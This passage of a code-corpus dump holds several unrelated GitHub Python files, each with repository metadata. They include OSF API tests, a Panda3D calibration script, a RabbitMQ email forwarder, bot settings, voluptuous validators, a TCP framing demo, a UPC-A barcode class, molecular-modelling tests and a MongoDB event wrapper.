return reg_schema
@pytest.fixture()
def provider(self, schema, out_dated_schema, invisible_schema, inactive_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(*[schema, out_dated_schema, invisible_schema, inactive_schema])
provider.save()
return provider
@pytest.fixture()
def provider_with_v2_prereg_only(self, schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(schema)
provider.save()
return provider
@pytest.fixture()
def provider_with_egap_only(self, egap_schema):
provider = RegistrationProviderFactory()
update_provider_auth_groups()
provider.schemas.add(egap_schema)
provider.save()
return provider
@pytest.fixture
def egap_admin(self):
user = AuthUserFactory()
user.save()
flag = Flag.objects.get(name=EGAP_ADMINS)
group = Group.objects.create(name=EGAP_ADMINS) # Just using the same name for convenience
flag.groups.add(group)
group.user_set.add(user)
group.save()
flag.save()
return user
@pytest.fixture()
def url(self, provider):
return f'/{API_BASE}providers/registrations/{provider._id}/schemas/'
@pytest.fixture()
def url_with_v2_prereg_only(self, provider_with_v2_prereg_only):
return f'/{API_BASE}providers/registrations/{provider_with_v2_prereg_only._id}/schemas/'
@pytest.fixture()
def url_with_egap_only(self, provider_with_egap_only):
return f'/{API_BASE}providers/registrations/{provider_with_egap_only._id}/schemas/'
def test_registration_provider_with_schema(
self,
app,
url,
schema,
egap_schema,
egap_admin,
invisible_schema,
user,
url_with_v2_prereg_only,
url_with_egap_only
):
res = app.get(url, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 2
assert schema._id in [item['id'] for item in data]
assert invisible_schema._id in [item['id'] for item in data]
assert schema.name in [item['attributes']['name'] for item in data]
res = app.get(url_with_v2_prereg_only, auth=egap_admin.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == schema._id
assert data[0]['attributes']['name'] == schema.name
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
def test_egap_registration_schema(
self,
app,
user,
egap_admin,
egap_schema,
url_with_egap_only
):
res = app.get(url_with_egap_only, auth=user.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 0
res = app.get(url_with_egap_only, auth=egap_admin.auth)
assert res.status_code == 200
data = res.json['data']
assert len(data) == 1
assert data[0]['id'] == egap_schema._id
assert data[0]['attributes']['name'] == egap_schema.name
| {
"content_hash": "411a910766815ccc62d4203749aa454e",
"timestamp": "",
"source": "github",
"line_count": 161,
"max_line_length": 104,
"avg_line_length": 30.763975155279503,
"alnum_prop": 0.6208358570563295,
"repo_name": "baylee-d/osf.io",
"id": "434a240c7ec195152df440ff299caa0889475477",
"size": "4953",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "api_tests/providers/registrations/views/test_registration_provider_schemas.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "92773"
},
{
"name": "Dockerfile",
"bytes": "5721"
},
{
"name": "HTML",
"bytes": "318459"
},
{
"name": "JavaScript",
"bytes": "1792442"
},
{
"name": "Jupyter Notebook",
"bytes": "41326"
},
{
"name": "Mako",
"bytes": "654930"
},
{
"name": "Python",
"bytes": "10662092"
},
{
"name": "VCL",
"bytes": "13885"
}
],
"symlink_target": ""
} |
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
setup(
name = 'stager',
version = '0.0.1',
description = 'the perfect Gentoo installer',
url = 'https://github.com/gentoo/stager',
author = 'Matthew Marchese',
author_email = '[email protected]',
license = 'To be determined...',
keywords = 'gentoo installer development',
packages = ['stager'],
    install_requires = [],
py_modules=['stager'],
)
| {
"content_hash": "65d8d7818457727a6c2864884b8bdd9c",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 49,
"avg_line_length": 27.22222222222222,
"alnum_prop": 0.6408163265306123,
"repo_name": "DigitalSurvival/kaudit",
"id": "411515e3be33e20565e888b8a6a8bf386c863116",
"size": "516",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "962"
}
],
"symlink_target": ""
} |
from __future__ import division
from direct.showbase.ShowBase import ShowBase
from direct.showbase.DirectObject import DirectObject
from panda3d.core import Point3, NodePath, LineSegs
from panda3d.core import OrthographicLens
from positions import Positions
from panda3d.core import WindowProperties
from positions import visual_angle
import numpy as np
import sys
class World(DirectObject):
def __init__(self):
# Program just to demonstrate where we are putting the positions for calibration
# Unlike the actual calibration routine, can see all of the squares at once
DirectObject.__init__(self)
#ShowBase.__init__(self)
self.base = ShowBase()
#print self.base.win.getRejectedProperties()
self.config = {}
#execfile('config_test.py', self.config)
execfile('config.py', self.config)
resolution = self.config['WIN_RES']
if not resolution or resolution == 'Test':
#print 'test'
# assume testing, small window
resolution = (800, 600)
print resolution
wp = WindowProperties()
wp.setSize(int(resolution[0]), int(resolution[1]))
wp.setOrigin(0, 0)
wp.setUndecorated(True)
self.base.win.requestProperties(wp)
# depth completely doesn't matter for this, since just 2d, and no layers
#self.depth = 55
self.depth = 0
self.base.setBackgroundColor(115/255, 115/255, 115/255)
# set up a 2d camera
camera = self.base.camList[0]
lens = OrthographicLens()
#print 'xwin', self.base.win.getProperties().getXSize()
lens.setFilmSize(int(resolution[0]), int(resolution[1]))
lens.setNearFar(-100, 100)
camera.node().setLens(lens)
# reparent it to pixel2d, so renders in pixel coordinates
camera.reparentTo(self.base.render)
#print 'xwin2', self.base.win.getXSize()
#print self.base.win.getYSize()
#print camera.ls()
self.accept("escape", sys.exit)
self.accept('space', self.next)
self.accept('a', self.all)
self.accept('d', self.degree_positions)
self.accept('s', self.change_square_size)
self.mode = 0
self.pos = []
#self.root = self.base.render.attachNewNode("Root")
self.make_circle()
def next(self):
#print 'xwin', self.base.win.getProperties().getXSize()
if self.mode == 0:
self.pos = Positions(self.config).get_position(self.depth, 'small')
self.mode = 1
square = self.make_square()
try:
square.setPos(Point3(self.pos.next()))
print square.getPos()
except StopIteration:
print 'done'
#square.setColor(175 / 255, 175 / 255, (i * 7) / 255, 1.0)
#print square.getColor()
    def all(self):
        # guard against re-entry: pressing 'a' twice would otherwise
        # iterate over pos = None
        if self.mode != 0:
            return
        self.make_circle()
        pos = Positions(self.config).get_position(self.depth)
        self.mode = 1
#print pos
#for i, j in enumerate(pos):
while True:
try:
position = pos.next()
except StopIteration:
break
square = self.make_square()
square.setPos(Point3(position))
#print square.getPos()
#print square.getTightBounds()
#sq_min, sq_max = square.getTightBounds()
#size = sq_max - sq_min
#print size[0], size[2]
    def change_square_size(self):
        # guard against re-entry: pos would stay None on a second key press
        if self.mode != 0:
            return
        self.config['MAX_DEGREES_X'] = 20
        self.config['MAX_DEGREES_Y'] = 20
        self.make_circle()
        pos = Positions(self.config).get_position(self.depth)
        self.mode = 1
res = [1024, 768]
# Screen size
screen = [1337, 991]
v_dist = 1219
b = 0
scale = 1
size_list = []
for i, j in enumerate(pos):
#b += 0.04 # covers all of the values if using 25 points
#b += 0.08
b += 0.03
scale += 0.5
#print b
#print i
#print j
square = self.make_square(scale)
square.setPos(Point3(j))
#print square.getPos()
#print square.getTightBounds()
sq_min, sq_max = square.getTightBounds()
size = sq_max - sq_min
#print size[0], size[2]
deg_per_pixel = visual_angle(screen, res, v_dist)
#print deg_per_pixel
print scale
print 'size in degrees, x', size[0] * deg_per_pixel[0]
print 'size in degrees, y', size[2] * deg_per_pixel[1]
size_list.append(size[0] * deg_per_pixel[0])
print size_list
import pickle
pickle.dump(size_list, open('size_list', 'wb'))
def degree_positions(self):
# set center, than 4 squares in cardinal directions at interval of 5 degree angles
if self.mode == 0:
self.pos = Positions(self.config).get_degree_positions(self.depth)
self.mode = 1
# get the center position
square = self.make_square()
square.setPos(Point3(self.pos.next()))
#print 'first', square.getPos()
else:
try:
for i in range(4):
square = self.make_square()
square.setPos(Point3(self.pos.next()))
print square.getPos()
except StopIteration:
print 'done'
def make_square(self, scale=None):
square = self.base.loader.loadModel("models/plane")
square.reparentTo(self.base.render)
#square.ls()
#square.setScale(0.05)
if scale:
square.setScale(scale)
else:
square.setScale(8.5)
square.setDepthTest(False)
square.setTransparency(1)
square.setTexture(self.base.loader.loadTexture("textures/calibration_square.png"), 1)
# gray
#square.setColor(150 / 255, 150 / 255, 150 / 255, 1.0)
# yellow
#square.setColor(175 / 255, 175 / 255, 130 / 255, 1.0)
square.setColor(0.9, 0.9, 0.6, 1.0)
#print square.getX()
#print square.getY()
#sq_min, sq_max = square.getTightBounds()
#size = sq_max - sq_min
#print size[0], size[2]
return square
def make_circle(self, angle_deg=360):
ls = LineSegs()
angle_radians = np.deg2rad(angle_deg)
# assume visual angle is approximately the same for x and y,
# which probably is not true, maybe need to change
#radius = 1 * Positions().visual_angle()[0]
res = [1024, 768]
# Screen size
screen = [1337, 991]
v_dist = 1219
# number of visual angles want circle radius to be
# (so twice this is the x and y of the square)
angle = 0.25
# visual angle returns degrees per pixel, so invert since
# we want pixel per degree
deg_per_pixel = visual_angle(screen, res, v_dist)
x_radius = angle * 1 / deg_per_pixel[0]
y_radius = angle * 1 / deg_per_pixel[0]
for i in range(50):
a = angle_radians * i / 49
y = y_radius * np.sin(a)
#print y
x = x_radius * np.cos(a)
#print x
ls.drawTo(x, self.depth, y)
#node = ls.create()
node = self.base.render.attachNewNode(ls.create(True))
return NodePath(node)
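    # Rough sketch of the math hidden in visual_angle() (the standard
    # flat-screen approximation; the real implementation lives in positions.py):
    #   total_angle_x = degrees(2 * atan((screen_x / 2) / v_dist))
    #   deg_per_pixel_x = total_angle_x / res_x
    # With screen_x=1337mm, v_dist=1219mm, res_x=1024 that is ~57.5 deg total,
    # ~0.056 deg/pixel, so a 0.25 deg radius comes out to ~4.5 pixels.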
if __name__ == "__main__":
print 'auto-running'
W = World()
W.base.run()
else:
print 'not auto-running'
| {
"content_hash": "d1b8e35f4c8d7c05e41fae2315fc4fbb",
"timestamp": "",
"source": "github",
"line_count": 215,
"max_line_length": 93,
"avg_line_length": 35.86976744186047,
"alnum_prop": 0.5560165975103735,
"repo_name": "codedragon/calibrate",
"id": "1b17c7bf3a0acfef293bed2bce8e29f374ba8ee2",
"size": "7712",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "check_positions.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "148793"
},
{
"name": "Shell",
"bytes": "1043"
}
],
"symlink_target": ""
} |
import ast
import pika
import smtplib
def email(FROM,TO,message,gmail_user,gmail_pwd):
server = smtplib.SMTP("74.125.22.108", 587)
server.ehlo()
server.starttls()
server.login(gmail_user, gmail_pwd)
server.sendmail(FROM, TO, message)
server.close()
connection = pika.BlockingConnection(pika.ConnectionParameters(
host='localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
print ' [*] Waiting for messages. To exit press CTRL+C'
def callback(ch, method, properties, body):
    # ast.literal_eval only parses Python literals, so (unlike eval) a crafted
    # queue message cannot execute arbitrary code
    data = ast.literal_eval(body)
    email(data['FROM'], data['TO'], data['message'], data['gmail_user'], data['gmail_pwd'])
    print "sent email"
channel.basic_consume(callback,
queue='hello',
no_ack=True)
channel.start_consuming()
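# A minimal producer sketch for the consumer above. callback() expects a
# repr()'d dict with exactly these keys; the addresses and credentials shown
# are placeholders:
#
#   import pika
#   payload = {'FROM': '[email protected]', 'TO': '[email protected]',
#              'message': 'Subject: hi\n\nhello there',
#              'gmail_user': 'me', 'gmail_pwd': 'secret'}
#   conn = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))
#   ch = conn.channel()
#   ch.queue_declare(queue='hello')
#   ch.basic_publish(exchange='', routing_key='hello', body=repr(payload))
#   conn.close()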
| {
"content_hash": "adace9545134501bf10d126f6d027d05",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 87,
"avg_line_length": 27.20689655172414,
"alnum_prop": 0.6628643852978454,
"repo_name": "deathping1994/sendmail-api",
"id": "2ada6877ffcebe7e8b2b04cbae555cfbea34abe9",
"size": "789",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "forward.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "20694"
},
{
"name": "CSS",
"bytes": "6111"
},
{
"name": "HTML",
"bytes": "449"
},
{
"name": "JavaScript",
"bytes": "6345"
},
{
"name": "Python",
"bytes": "5285925"
},
{
"name": "Shell",
"bytes": "3759"
}
],
"symlink_target": ""
} |
import json
import os
import logging
import argparse
from copy import deepcopy
from random import randint
default_path = "data/settings.json"
class Settings:
def __init__(self, path=default_path):
self.path = path
self.default_settings = {
"TOKEN": None,
"EMAIL": None,
"PASSWORD": None,
"OWNER": None,
"PREFIXES": [],
"default": {"ADMIN_ROLE": ["Daddy"],
"MOD_ROLE": ["Deds"],
"PREFIXES": []}
}
self.logger = logging.getLogger("Conf")
self.current = self._load_json()
self.self_bot = False
    def parse_cmd_arguments(self):
        parser = argparse.ArgumentParser(description="FociePlays - Deds Bot")
        parser.add_argument("--owner", help="ID of the owner. Only who hosts "
                            "FociePlaysDeds should be owner, this has "
                            "security implications")
        parser.add_argument("--admin-role", help="Role seen as admin role by the bot")
        parser.add_argument("--mod-role", help="Role seen as mod role by the bot")
        return parser.parse_args()
    def _load_json(self):
        current = None
        try:
            with open(self.path, encoding='utf-8', mode="r") as f:
                current = json.load(f)
        except (IOError, OSError, ValueError):
            # missing or corrupt file: recreate with defaults (leaving
            # `current` as None here would crash on current.keys() below)
            current = deepcopy(self.default_settings)
            self.current = current
            self._save_json()
if current.keys() != self.default_settings.keys():
for key in self.default_settings.keys():
if key not in current.keys():
current[key] = self.default_settings[key]
print("Adding " + str(key) +
" field to red settings.json")
self.current = current
self._save_json()
return current
def _save_json(self):
rnd = randint(1000, 9999)
fpath, ext = os.path.splitext(self.path)
tmp_file = "{}-{}.tmp".format(fpath, rnd)
try:
with open(tmp_file, encoding='utf-8', mode="w") as f:
json.dump(self.current, f, indent=4, sort_keys=True,
separators=(',', ' : '))
        except (TypeError, ValueError):
            # json.dump raises TypeError/ValueError for unserializable data;
            # JSONDecodeError only applies when *reading* JSON
            self.logger.exception("Attempted to write file {} but the data "
                                  "could not be serialized as JSON. "
                                  "The original file is unaltered."
                                  "".format(self.path))
            return False
os.replace(tmp_file, self.path)
    @property
    def mod_role(self):
        # these roles are stored under the "default" key (see default_settings)
        return self.current["default"]["MOD_ROLE"]
    @property
    def admin_role(self):
        return self.current["default"]["ADMIN_ROLE"]
@property
def spec_roles(self):
return set(self.mod_role) | set(self.admin_role)
@property
def owner(self):
return self.current["OWNER"]
@owner.setter
def owner(self, value):
self.current["OWNER"] = value
@property
def token(self):
return os.environ.get("RED_TOKEN", self.current["TOKEN"])
@token.setter
def token(self, value):
self.current["TOKEN"] = value
self.current["EMAIL"] = None
self.current["PASSWORD"] = None
@property
def email(self):
return os.environ.get("RED_EMAIL", self.current["EMAIL"])
@email.setter
def email(self, value):
self.current["EMAIL"] = value
self.current["TOKEN"] = None
@property
def password(self):
return os.environ.get("RED_PASSWORD", self.current["PASSWORD"])
@password.setter
def password(self, value):
self.current["PASSWORD"] = value
@property
def login_credentials(self):
if self.token:
return (self.token,)
elif self.email and self.password:
return (self.email, self.password)
else:
return tuple()
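    # Sketch of how a caller would consume this (the bot/run call is
    # illustrative, not part of this class):
    #
    #   creds = settings.login_credentials
    #   if not creds:
    #       raise RuntimeError('no token or email/password configured')
    #   bot.run(*creds)  # one arg for a token, two for email + password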
| {
"content_hash": "9413ed569723937e253044827510eb59",
"timestamp": "",
"source": "github",
"line_count": 125,
"max_line_length": 87,
"avg_line_length": 31.984,
"alnum_prop": 0.5377688844422212,
"repo_name": "LogicaExMachina/FoxDedsBot",
"id": "ba68b060fbe07fa376d88c9fcc430bcfd18e1f9e",
"size": "3998",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Settings/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "15953"
}
],
"symlink_target": ""
} |
import sys
from voluptuous.error import LiteralInvalid, TypeInvalid, Invalid
from voluptuous.schema_builder import Schema, default_factory, raises
from voluptuous import validators
__author__ = 'tusharmakkar08'
def Lower(v):
"""Transform a string to lower case.
>>> s = Schema(Lower)
>>> s('HI')
'hi'
"""
return str(v).lower()
def Upper(v):
"""Transform a string to upper case.
>>> s = Schema(Upper)
>>> s('hi')
'HI'
"""
return str(v).upper()
def Capitalize(v):
"""Capitalise a string.
>>> s = Schema(Capitalize)
>>> s('hello world')
'Hello world'
"""
return str(v).capitalize()
def Title(v):
"""Title case a string.
>>> s = Schema(Title)
>>> s('hello world')
'Hello World'
"""
return str(v).title()
def Strip(v):
"""Strip whitespace from a string.
>>> s = Schema(Strip)
>>> s(' hello world ')
'hello world'
"""
return str(v).strip()
class DefaultTo(object):
"""Sets a value to default_value if none provided.
>>> s = Schema(DefaultTo(42))
>>> s(None)
42
>>> s = Schema(DefaultTo(list))
>>> s(None)
[]
"""
def __init__(self, default_value, msg=None):
self.default_value = default_factory(default_value)
self.msg = msg
def __call__(self, v):
if v is None:
v = self.default_value()
return v
def __repr__(self):
return 'DefaultTo(%s)' % (self.default_value(),)
class SetTo(object):
"""Set a value, ignoring any previous value.
>>> s = Schema(validators.Any(int, SetTo(42)))
>>> s(2)
2
>>> s("foo")
42
"""
def __init__(self, value):
self.value = default_factory(value)
def __call__(self, v):
return self.value()
def __repr__(self):
return 'SetTo(%s)' % (self.value(),)
class Set(object):
"""Convert a list into a set.
>>> s = Schema(Set())
>>> s([]) == set([])
True
>>> s([1, 2]) == set([1, 2])
True
>>> with raises(Invalid, regex="^cannot be presented as set: "):
... s([set([1, 2]), set([3, 4])])
"""
def __init__(self, msg=None):
self.msg = msg
def __call__(self, v):
try:
set_v = set(v)
except Exception as e:
raise TypeInvalid(
self.msg or 'cannot be presented as set: {0}'.format(e))
return set_v
def __repr__(self):
return 'Set()'
class Literal(object):
def __init__(self, lit):
self.lit = lit
def __call__(self, value, msg=None):
if self.lit != value:
raise LiteralInvalid(
msg or '%s not match for %s' % (value, self.lit)
)
else:
return self.lit
def __str__(self):
return str(self.lit)
def __repr__(self):
return repr(self.lit)
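# Usage sketch: Literal gives exact-value matching inside a Schema, including
# for containers that Schema would otherwise validate structurally:
#
#   >>> s = Schema(Literal({'a': 1}))
#   >>> s({'a': 1})
#   {'a': 1}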
def u(x):
if sys.version_info < (3,):
return unicode(x)
else:
return x
| {
"content_hash": "e5305f82575f9680ba8f4fd3c4724644",
"timestamp": "",
"source": "github",
"line_count": 154,
"max_line_length": 72,
"avg_line_length": 19.415584415584416,
"alnum_prop": 0.5163879598662208,
"repo_name": "tuukkamustonen/voluptuous",
"id": "434c360c7e95a90076782850cc917179762ecf83",
"size": "2990",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "voluptuous/util.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "116459"
},
{
"name": "Shell",
"bytes": "1758"
}
],
"symlink_target": ""
} |
import socket
import struct
header_struct = struct.Struct('!I')  # messages up to 2 ** 32 - 1 bytes in length
def recvall(sock, length):
blocks = []
while length:
block = sock.recv(length)
if not block:
raise EOFError('Socket closed with {} bytes left'.format(length))
length -= len(block)
blocks.append(block)
return b''.join(blocks)
def get_blocks(sock):
data = recvall(sock, header_struct.size)
(block_length, ) = header_struct.unpack(data)
return recvall(sock, block_length)
def put_blocks(sock, message):
    block_length = len(message)
    # sendall, unlike send, retries until the whole buffer is written
    sock.sendall(header_struct.pack(block_length))
    sock.sendall(message)
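# Framing sketch: the 4-byte network-order length prefix round-trips like this
# (pure struct, no sockets involved):
#
#   >>> header_struct.pack(5)
#   b'\x00\x00\x00\x05'
#   >>> header_struct.unpack(b'\x00\x00\x00\x05')
#   (5,)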
def server(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(address)
sock.listen(1)
print('Run this script in another window with -c option to connect')
print('Listening at', sock.getsockname())
sc, sockname = sock.accept()
print('Accepted connection from', sockname)
    # shut down the *connected* socket for writing; the server only reads
    sc.shutdown(socket.SHUT_WR)
while True:
block = get_blocks(sc)
if not block:
break
print('Block says:', repr(block))
sc.close()
sock.close()
def client(address):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(address)
sock.shutdown(socket.SHUT_RD)
put_blocks(sock, b'Beautiful is better than ugly.')
put_blocks(sock, b'Explicit is better than implicit')
put_blocks(sock, b'Simple is better than complex')
put_blocks(sock, b'')
sock.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Transmit and Receive blocks over TCP')
parser.add_argument('hostname', nargs='?', default='127.0.0.1',
help='IP address or hostname (default: %(default)s)')
parser.add_argument('-c', action='store_true', help='run as client')
    parser.add_argument('-p', type=int, metavar='port', default=1060,
                        help='TCP port number (default: %(default)s)')
args = parser.parse_args()
function = client if args.c else server
function((args.hostname, args.p))
| {
"content_hash": "748b9d9f1b4239d03b0159368f118b36",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 77,
"avg_line_length": 31.507042253521128,
"alnum_prop": 0.6414841305319624,
"repo_name": "gauravssnl/python3-network-programming",
"id": "e21ef19b90b94b632873d20f015157dad3ef29f5",
"size": "2331",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "blocks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "64452"
},
{
"name": "Python",
"bytes": "51195"
}
],
"symlink_target": ""
} |
"""UPC module.
:Provided barcodes: UPC-A
"""
from functools import reduce
from .base import Barcode
from .charsets import upc as _upc
from .errors import IllegalCharacterError
from .helpers import sum_chars
class UPCA(Barcode):
"""Class for UPC-A bar codes.
Args:
code (str): UPC-A bar code.
writer (:py:class:`.writer.BaseWriter`): instance of writer class to render the bar code.
"""
name = 'UPC-A'
digits = 12
    def __init__(self, code, writer=None):
        super(UPCA, self).__init__(code, writer)
@staticmethod
def calculate_checksum(code):
"""Calculates the UPC-A checksum.
Args:
code (str): UPC-A code.
Returns:
(int): UPC-A checksum.
"""
sum_odd = reduce(sum_chars, code[::2])
sum_even = reduce(sum_chars, code[1:-1:2])
check = (sum_even + sum_odd * 3) % 10
if check == 0:
return 0
else:
return 10 - check
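    # Worked example with the valid UPC-A code '036000291452':
    #   odd-position digits  (1st, 3rd, ..., 11th): 0+6+0+2+1+5 = 14
    #   even-position digits (2nd, ..., 10th):      3+0+0+9+4   = 16
    #   (16 + 14 * 3) % 10 = 8  ->  check digit = 10 - 8 = 2 (matches)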
@staticmethod
def validate(code):
"""Calculates a UPC-A code checksum.
Args:
code (str): UPC-A code.
Raises:
IllegalCharacterError in case the bar code contains illegal characters.
ValueError in case the bar code exceeds its maximum length or
if the checksum digit doesn't match.
"""
if not code.isdigit():
raise IllegalCharacterError('[0-9]{%d}' % UPCA.digits)
if len(code) != UPCA.digits:
raise ValueError('Bar code %s requires %d digits' % (code, UPCA.digits))
checksum = UPCA.calculate_checksum(code)
if checksum != int(code[-1]):
raise ValueError('Checksum character mismatch %s != %s' % (checksum, code[-1]))
def build(self):
"""Builds the bar code pattern.
Returns:
(str): the bar code pattern.
"""
code = _upc.EDGE[:]
        for number in self.code[0:6]:
            code += _upc.CODES['L'][int(number)]
code += _upc.MIDDLE
for number in self.code[6:]:
code += _upc.CODES['R'][int(number)]
code += _upc.EDGE
return [code]
def to_ascii(self):
"""Returns an ASCII representation of the bar code.
Returns:
(str): ASCII representation of the bar code.
"""
code = self.build()
for i, line in enumerate(code):
code[i] = line.replace('1', '|').replace('0', '_')
return '\n'.join(code)
def render(self, writer_options=None):
options = dict(module_width=0.33)
options.update(writer_options or {})
return super(UPCA, self).render(options)
def get_fullcode(self):
return self._code
UniversalProductCodeA = UPCA
| {
"content_hash": "fd6bc6d9c1b0b4a377874b06a3ebdac8",
"timestamp": "",
"source": "github",
"line_count": 111,
"max_line_length": 97,
"avg_line_length": 25.414414414414413,
"alnum_prop": 0.5597305919886565,
"repo_name": "steenzout/python-barcode",
"id": "291d51681aed73df3759ffe2087a04aa70541139",
"size": "2845",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "steenzout/barcode/upc.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "64780"
}
],
"symlink_target": ""
} |
import pytest
import warnings
import offlinetb
def test_capture_warnings(recwarn):
warnings.simplefilter('always')
try:
f()
except CustomException:
tb = offlinetb.distill(var_depth=4)
[v] = [v for v in tb['traceback'][-1]['vars'] if v['name'] == 's']
assert v['vars'][0]['value'] == "'hi'"
assert len(recwarn) == 0
def f():
g()
def g():
class Something(object):
@property
def prop(self):
warnings.warn('deprecated', DeprecationWarning)
return 'hi'
s = Something() # pylint: disable=unused-variable
raise CustomException()
class CustomException(Exception):
pass
| {
"content_hash": "a2e00cbf2d8c5ccd09bdb97cf7af6185",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 70,
"avg_line_length": 19.542857142857144,
"alnum_prop": 0.5877192982456141,
"repo_name": "vmalloc/offlinetb",
"id": "833cea6c8f196852284de6dc389d774266d2333e",
"size": "684",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/test_deprecation_warnings_handling.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "2204"
},
{
"name": "HTML",
"bytes": "578"
},
{
"name": "JavaScript",
"bytes": "5196"
},
{
"name": "Makefile",
"bytes": "197"
},
{
"name": "Python",
"bytes": "17709"
}
],
"symlink_target": ""
} |
import pytest
import moldesign as mdt
from moldesign import units as u
from .molecule_fixtures import *
from . import helpers
def test_forcefield_atom_term_access(protein_default_amber_forcefield):
mol = protein_default_amber_forcefield
for atom in mol.atoms:
assert atom.ff.ljepsilon.dimensionality == u.kcalpermol.dimensionality
assert atom.ff.ljsigma.dimensionality == u.angstrom.dimensionality
assert atom.ff.partial_charge.dimensionality == u.q_e.dimensionality
assert atom.ff.pmdobj.idx == atom.index
assert atom.ff.pmdobj.element == atom.atnum
@pytest.mark.screening
def test_forcefield_bond_term_access(protein_default_amber_forcefield):
mol = protein_default_amber_forcefield
for bond in mol.bonds:
assert bond.ff.equilibrium_length.dimensionality == u.angstrom.dimensionality
assert bond.ff.force_constant.dimensionality == (u.kcalpermol/u.angstrom).dimensionality
pmdobj = bond.ff.pmdobj
pmdatoms = sorted((pmdobj.atom1, pmdobj.atom2), key=lambda x:x.idx)
assert (pmdatoms[0].idx, pmdatoms[1].idx) == (bond.a1.index, bond.a2.index)
assert (pmdatoms[0].element, pmdatoms[1].element) == (bond.a1.atnum, bond.a2.atnum)
def test_atom_basis_function_returns_none_if_no_wfn(h2):
for atom in h2.atoms:
assert atom.basis_functions is None
def test_atom_ffterms_returns_none_if_no_ff(h2):
for atom in h2.atoms:
assert atom.ff is None
def test_bond_ffterms_returns_none_if_no_ff(h2):
for bond in h2.bonds:
assert bond.ff is None
def test_basis_function_atom_access(h2_rhf_sto3g):
mol = h2_rhf_sto3g
for atom in mol.atoms:
assert len(atom.basis_functions) == 1 # good ol' sto-3g
assert len(atom.basis_functions[0].primitives) == 3
@pytest.mark.screening
def test_atom_property_access_to_mulliken_charges(h2_rhf_sto3g):
mol = h2_rhf_sto3g
for atom in mol.atoms:
assert abs(atom.properties.mulliken) <= 1e-5 * u.q_e
def test_atomic_forces(h2_rhf_sto3g):
mol = h2_rhf_sto3g
helpers.assert_almost_equal(mol.atoms[0].force, -mol.atoms[1].force)
def test_atom_properties_are_empty_dict_if_nothings_computed(h2):
empty = mdt.utils.DotDict()
for atom in h2.atoms:
assert atom.properties == empty
| {
"content_hash": "b8cdc58213ecd455d7c7e31da21d31e0",
"timestamp": "",
"source": "github",
"line_count": 71,
"max_line_length": 96,
"avg_line_length": 32.605633802816904,
"alnum_prop": 0.6997840172786177,
"repo_name": "Autodesk/molecular-design-toolkit",
"id": "d261cdb21c50a3ceaf2bb1c4d1b31173cc7d98e9",
"size": "2315",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "moldesign/_tests/test_atom_bond_computed_properties.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "141674"
},
{
"name": "Python",
"bytes": "1048484"
},
{
"name": "Shell",
"bytes": "12039"
}
],
"symlink_target": ""
} |
from datetime import datetime, timedelta
from pymongo import MongoClient, ReturnDocument
from pymongo.database import Database
from pymongo.errors import PyMongoError
from model.event import Event
from persist.eventencoder import EventEncoder
class MongoWrapper:
def __init__(self, debug=False):
self.debug = debug
try:
self.client = MongoClient('mongodb://localhost:27017/?connectTimeoutMS=100')
self.db = self.client.calendar
self.client.server_info()
except PyMongoError:
self.client = None
self.db = None
def save(self, _events, delete=True):
encoder = EventEncoder()
success = {"inserts": 0, "updates": 0, "deleted": 0}
failed = {"inserts": 0, "updates": 0, "deleted": 0}
skipped = 0
if self.db is None or self.client is None:
if self.debug:
print("Could not persist to MongoDB")
return False
if self.debug:
print("Begin MongoDB persist:")
min_date = datetime.now() + timedelta(weeks=12)
max_date = datetime.strptime('1970-01-01 00:00:00', '%Y-%m-%d %H:%M:%S')
ids = []
types = []
for _event in _events:
ids.append(_event.cal_id)
min_date = min(_event.start_time, min_date)
max_date = max(_event.start_time, max_date)
if _event.type not in types:
types.append(_event.type)
if isinstance(_event, Event):
original = self.db.events.find_one({"cal_id": _event.cal_id, "type": _event.type, "canceled": False, "start_time": _event.start_time, "end_time": _event.end_time})
if original is None:
_event.last_modified_time = datetime.now()
result = self.db.events.insert_one(encoder.encode(_event))
""" :type : pymongo.results.InsertOneResult """
if result.inserted_id:
success['inserts'] += 1
else:
